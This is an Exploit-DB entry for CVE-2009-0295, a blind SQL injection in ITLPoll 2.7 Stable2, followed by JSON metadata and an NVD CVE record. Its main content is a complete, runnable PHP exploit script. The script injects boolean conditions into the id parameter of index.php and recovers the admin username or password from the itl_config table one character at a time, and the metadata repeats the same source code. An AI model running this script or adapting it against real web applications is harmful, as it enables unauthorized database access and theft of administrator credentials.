ID EDB-ID:7867
Type exploitdb
Reporter fuzion
Modified 2009-01-26T00:00:00
Description
ITLPoll 2.7 Stable2 (index.php id) Blind SQL Injection Exploit. CVE-2009-0295. Webapps exploit for php platform
<?php
function usage ()
{
echo "\nITLPoll v2.7 Stable2 Blind SQL Injection Exploit".
"\n[☢] Usage : ./itlpoll.php hostname path <username or password>".
"\n[☢] Ex : ./itlpoll.php localhost /itlpoll password".
"\n\n";
exit ();
}
function query ($func, $chr, $pos)
{ //replace 1' with a valid poll number if you have problems. See hostname/path/?Archive for a list of polls.
$query = "1' AND ORD(MID((SELECT IFNULL(CAST({$func} AS CHAR(10000)), CHAR(32)) FROM itl_config WHERE id = 1),{$pos},1))='{$chr}";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}
function exploit ($host, $path, $func, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($host, 80);
$query = query ($func, $chr, $pos);
$request = "GET {$path}/index.php?id={$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
fclose ($fp);
if (preg_match ("/EXPIERED/", $reply))
return false;
else
return true;
}
if ($argc != 4)
usage ();
$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; //add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;
echo "[☢] Creds: ";
while ($pos <= 32)
{
if (exploit ($host, $path, $func, $pos, $key [$chr]))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
?>
# milw0rm.com [2009-01-26]
{"published": "2009-01-26T00:00:00", "id": "EDB-ID:7867", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hash": "a71a976e70057cb0fe5586ecdf4c1a4062ca5cb2b07f18abe31f035c7e000ee4", "description": "ITLPoll 2.7 Stable2 (index.php id) Blind SQL Injection Exploit. CVE-2009-0295. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/7867/", "lastseen": "2016-02-01T03:14:43", "edition": 1, "title": "ITLPoll 2.7 Stable2 index.php id Blind SQL Injection Exploit", "osvdbidlist": ["51616"], "modified": "2009-01-26T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0295"], "sourceHref": "https://www.exploit-db.com/download/7867/", "references": [], "reporter": "fuzion", "sourceData": "<?php\n\nfunction usage ()\n{\n echo \"\\nITLPoll v2.7 Stable2 Blind SQL Injection Exploit\".\n \"\\n[\u00e2\u02dc\u00a2] Usage : ./itlpoll.php hostname path <username or password>\".\n \"\\n[\u00e2\u02dc\u00a2] Ex\t: ./itlpoll.php localhost /itlpoll password\".\n\t \"\\n\\n\";\n exit ();\n}\n\n\nfunction query ($func, $chr, $pos)\n{ //replace 1' with a valid poll number if you have problems. See hostname/path/?Archive for a list of polls.\n $query = \"1' AND ORD(MID((SELECT IFNULL(CAST({$func} AS CHAR(10000)), CHAR(32)) FROM itl_config WHERE id = 1),{$pos},1))='{$chr}\";\n $query = str_replace (\" \", \"%20\", $query);\n $query = str_replace (\"'\", \"%27\", $query);\n return $query;\n}\n\nfunction exploit ($host, $path, $func, $pos, $chr)\n{\n $chr = ord ($chr);\n $fp = fsockopen ($host, 80);\n $query = query ($func, $chr, $pos);\n $request = \"GET {$path}/index.php?id={$query} HTTP/1.1\\r\\n\".\n \"Host: {$host}\\r\\n\".\n \"Connection: Close\\r\\n\\r\\n\";\n \n fputs ($fp, $request);\n while (!feof ($fp))\n $reply .= fgets ($fp, 1024);\n \n fclose ($fp);\n\n if (preg_match (\"/EXPIERED/\", $reply))\n return false;\n else\n return true;\n}\n\n\nif ($argc != 4)\n\n usage ();\n\n$host = $argv [1];\n$path = $argv [2];\n$func = $argv [3];\n$key = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\"; //add a bigger char set if you can't get the username\n$pos = 1;\n$chr = 0;\n\necho \"[\u00e2\u02dc\u00a2] Creds: \";\n\nwhile ($pos <= 32)\n{\n if (exploit ($host, $path, $func, $pos, $key [$chr]))\n {\n echo $key [$chr];\n $chr = 0;\n $pos++;\n }\n else\n $chr++;\n}\necho \"\\n\";\n?>\n\n# milw0rm.com [2009-01-26]\n", "objectVersion": "1.0"}
{"cve": [{"lastseen": "2017-09-29T14:26:28", "references": ["https://www.exploit-db.com/exploits/7867", "http://www.securityfocus.com/bid/33452"], "description": "SQL injection vulnerability in index.php in Information Technology Light Poll Information (ITLPoll) 2.7 Stable 2, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 2, "reporter": "NVD", "published": "2009-01-27T15:30:05", "title": "CVE-2009-0295", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:28", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-0295"], "scanner": [], "modified": "2017-09-28T21:33:43", "cpe": ["cpe:/a:itlpoll:itpoll:2.7"], "id": "CVE-2009-0295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0295", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
